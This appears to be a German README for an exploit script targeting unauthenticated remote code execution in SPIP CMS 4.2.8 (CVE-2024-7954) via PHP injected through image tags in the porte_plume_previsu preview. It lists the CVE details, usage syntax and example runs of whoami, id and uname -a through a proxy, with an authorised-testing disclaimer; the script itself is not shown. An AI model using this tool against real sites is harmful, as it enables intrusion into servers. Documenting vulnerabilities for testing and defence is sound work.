
Exploit für nicht authentifizierte Remote-Befehlsausführung für SPIP CMS 4.2.8 (CVE-2024-7954) mit Proxy-Unterstützung und Live-Ausgabeabruf.
Dieses Skript nutzt eine Remote-Code-Execution-Schwachstelle in SPIP Version 4.2.8 über den porte_plume_previsu-Endpunkt aus. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, PHP-Code durch die Vorschau-Wiedergabe manipulierte Bild-Tags einzuschleusen.
CVE-ID: CVE-2024-7954
Komponente: SPIP CMS (porte_plume_previsu)
Auswirkung: Nicht authentifizierte Remote-Code-Ausführung
Schweregrad: Kritisch
python3 cve_2024_7954_rce.py --url <ZIEL_URL> --cmd <BEFEHL> [--proxy <IP:PORT>]
python3 cve_2024_7954_rce.py --url <ZIEL_URL> --cmd "whoami" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <ZIEL_URL> --cmd "id" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <ZIEL_URL> --cmd "uname -a" --proxy "127.0.0.1:8080"


Dieses Exploit-Skript dient ausschließlich autorisierten Sicherheitstests, defensiver Forschung und Bildungszwecken.